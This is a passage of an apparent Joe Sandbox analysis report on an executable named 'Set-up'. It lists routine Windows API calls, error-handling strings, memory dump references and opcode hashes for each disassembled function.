                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleCursorErrorExceptionException@8InfoLastRaiseThrow
                                                                                                                                  • String ID: GetConsoleCursorInfo()
                                                                                                                                  • API String ID: 2095948160-1023831658
                                                                                                                                  • Opcode ID: 45468d559f35a0711433d9dc1985b8ffbfca830a0152b3b10ce8b1c4806c6c6c
                                                                                                                                  • Instruction ID: 2fc7e3cd4d7ba69a8f945007c37c8887676ec42abc5dacd795d80d1f46dc7661
                                                                                                                                  • Opcode Fuzzy Hash: 45468d559f35a0711433d9dc1985b8ffbfca830a0152b3b10ce8b1c4806c6c6c
                                                                                                                                  • Instruction Fuzzy Hash: 922190B05002099FCB14DF55D958B9AFBF9FB04714F10866AE815A7390DB756A04CB90
                                                                                                                                  Function 00E655C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(?,?,460C02D8,?,?), ref: 00E65639
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E65643
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65687
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  • GetConsoleScreenBufferInfo(), xrefs: 00E65661
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BufferConsoleErrorExceptionException@8InfoLastRaiseScreenThrow
                                                                                                                                  • String ID: GetConsoleScreenBufferInfo()
                                                                                                                                  • API String ID: 2627591521-3161664225
                                                                                                                                  • Opcode ID: 1d016bed24a8cb977c83942a3ef22d71eb8184d1a196d8c71e77f802d8ca54b2
                                                                                                                                  • Instruction ID: 321afda556007445ac594bc3c66222c0006164981a581d0c7fcf656786c2b084
                                                                                                                                  • Opcode Fuzzy Hash: 1d016bed24a8cb977c83942a3ef22d71eb8184d1a196d8c71e77f802d8ca54b2
                                                                                                                                  • Instruction Fuzzy Hash: 5D21AFB0A00209EFCB14DF55D958B9EFBF8FF04724F10866AE815A7394DB75AA04CB90
                                                                                                                                  Function 00E6A0F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FillConsoleOutputCharacterW.KERNEL32(?,00000020,?,?,?,?,?), ref: 00E6A118
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6A122
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6A17B
                                                                                                                                  Strings
                                                                                                                                  • FillConsoleOutputCharacterW(), xrefs: 00E6A155
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharacterConsoleErrorException@8FillLastOutputThrow
                                                                                                                                  • String ID: FillConsoleOutputCharacterW()
                                                                                                                                  • API String ID: 1530539340-1629237787
                                                                                                                                  • Opcode ID: 5a30eb050800bd36abfb189f3506e1ebb929d5ae146bca4c6cedc8b9ab92423b
                                                                                                                                  • Instruction ID: a0b2d5aecd484d427040866b842967c08b7f30771913a9275ba7a9d1f0a3921b
                                                                                                                                  • Opcode Fuzzy Hash: 5a30eb050800bd36abfb189f3506e1ebb929d5ae146bca4c6cedc8b9ab92423b
                                                                                                                                  • Instruction Fuzzy Hash: 2801C871204605AFC714EF24DC45E6ABBE4FB44750F00462DF961A3295DB70A815CB92
                                                                                                                                  Function 00E6A050 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteConsoleW.KERNEL32(460C02D8,?,?,00000000,00000000,?,?), ref: 00E6A078
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6A082
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6A0DB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleErrorException@8LastThrowWrite
                                                                                                                                  • String ID: WriteConsoleW()
                                                                                                                                  • API String ID: 221999844-2010213256
                                                                                                                                  • Opcode ID: 024b6f8939d5f5b16c7317dc7e95f5b25032789cdc542c9e1f680c9efe9c505e
                                                                                                                                  • Instruction ID: 62f982bc14455ab0931ca7e11b3740b75e4103b0bcc66474d4999e52d759c0aa
                                                                                                                                  • Opcode Fuzzy Hash: 024b6f8939d5f5b16c7317dc7e95f5b25032789cdc542c9e1f680c9efe9c505e
                                                                                                                                  • Instruction Fuzzy Hash: 1501C431604205AFC724EF24DC45F6ABBE8EB48720F104629F965932D4DB70B914CB92
                                                                                                                                  Function 010FF090 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 010FF118
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  Strings
                                                                                                                                  • AutoApplyUpdates(), xrefs: 010FF0C5
                                                                                                                                  • Unrecognized update type., xrefs: 010FF0EF
                                                                                                                                  • BscUpdateSettings::AutoApplyUpdateType, xrefs: 010FF0C0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BreakConcurrency::cancel_current_taskDebugDebuggerException@8FileModuleNamePresentThrow
                                                                                                                                  • String ID: AutoApplyUpdates()$BscUpdateSettings::AutoApplyUpdateType$Unrecognized update type.
                                                                                                                                  • API String ID: 845167122-1603989448
                                                                                                                                  • Opcode ID: 9fae4f410396b3f674185b51286ea7404312335955f65b73ed570807bcf9049b
                                                                                                                                  • Instruction ID: 83e0e3b99c40d7e83dcde005d10687cf085a1c7931af48bda86dc49a158d2147
                                                                                                                                  • Opcode Fuzzy Hash: 9fae4f410396b3f674185b51286ea7404312335955f65b73ed570807bcf9049b
                                                                                                                                  • Instruction Fuzzy Hash: 01110672A48249ABD715DF6CD803B9DBBE4E705B20F00429EE96493BC0DB7665008684
                                                                                                                                  Function 00E65B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000000,?,?), ref: 00E65BAD
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E65BD8
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65C39
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8LastObjectSingleThrowWait
                                                                                                                                  • String ID: WaitForSingleObject()
                                                                                                                                  • API String ID: 4286754232-2408256805
                                                                                                                                  • Opcode ID: 2d483625df4ff0df2b49a3f763544691bcec42e6984babc4505c21a72a1488fe
                                                                                                                                  • Instruction ID: 525609eb55e241c621b6011edf16763a3e5ae480fc61b528cb2846155b0d5276
                                                                                                                                  • Opcode Fuzzy Hash: 2d483625df4ff0df2b49a3f763544691bcec42e6984babc4505c21a72a1488fe
                                                                                                                                  • Instruction Fuzzy Hash: 7711E6313546059FC728DB38DC46BADB7E4AF55724F10066AF961972E0DB70BC50C792
                                                                                                                                  Function 00E6AE00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E699C0: new.LIBCMT ref: 00E69A39
                                                                                                                                  • CreateEventW.KERNEL32(00000000,?,?,00000000,460C02D8), ref: 00E6AE4F
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6AE5C
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6AEA0
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorEventExceptionException@8LastRaiseThrow
                                                                                                                                  • String ID: CreateEventW()
                                                                                                                                  • API String ID: 4167972103-4236875438
                                                                                                                                  • Opcode ID: 3ae799217e14511e7de896b1753159a5c1b2cbcfc71a6111e9dd56699dac0e25
                                                                                                                                  • Instruction ID: 56f48704a0ee25e8e4777ad2ae10990bfe5153a311083edfe29526579bbf4dee
                                                                                                                                  • Opcode Fuzzy Hash: 3ae799217e14511e7de896b1753159a5c1b2cbcfc71a6111e9dd56699dac0e25
                                                                                                                                  • Instruction Fuzzy Hash: A921D571940249AFCB18DF65D955BAEBBF8FF44710F00416AF925E7280DB74A904CB90
                                                                                                                                  Function 00E5E110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 00E5E140
                                                                                                                                  • GetLastError.KERNEL32(00000001,?), ref: 00E5E199
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5E1BE
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorExceptionException@8LastProcRaiseThrow
                                                                                                                                  • String ID: GetProcAddress(
                                                                                                                                  • API String ID: 577639657-3397178597
                                                                                                                                  • Opcode ID: fb26a3fce4a09d05616a174a239a9f59ab641af878651cc2f2a9f8e94c6dadca
                                                                                                                                  • Instruction ID: 853239252e4bc19bd30cf4f25d82b51dc58f119375a3fdbdcb844e0a2aaf11ac
                                                                                                                                  • Opcode Fuzzy Hash: fb26a3fce4a09d05616a174a239a9f59ab641af878651cc2f2a9f8e94c6dadca
                                                                                                                                  • Instruction Fuzzy Hash: 8C1106B2900248EBCB14DBA0EC45FCEBBFCEF14714F004569F905A3281EB756A04C790
                                                                                                                                  Function 00F12FC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00F13300: EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 00F13338
                                                                                                                                    • Part of subcall function 00F13300: GetCurrentThreadId.KERNEL32 ref: 00F13349
                                                                                                                                    • Part of subcall function 00F13300: __CxxThrowException@8.LIBVCRUNTIME ref: 00F13373
                                                                                                                                    • Part of subcall function 00F13300: LeaveCriticalSection.KERNEL32(0131BE48), ref: 00F13384
                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(00000000,00000000,00000000), ref: 00F12FDD
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00F13038
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F13063
                                                                                                                                  Strings
                                                                                                                                  • QueryPerformanceFrequency(), xrefs: 00F13046
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
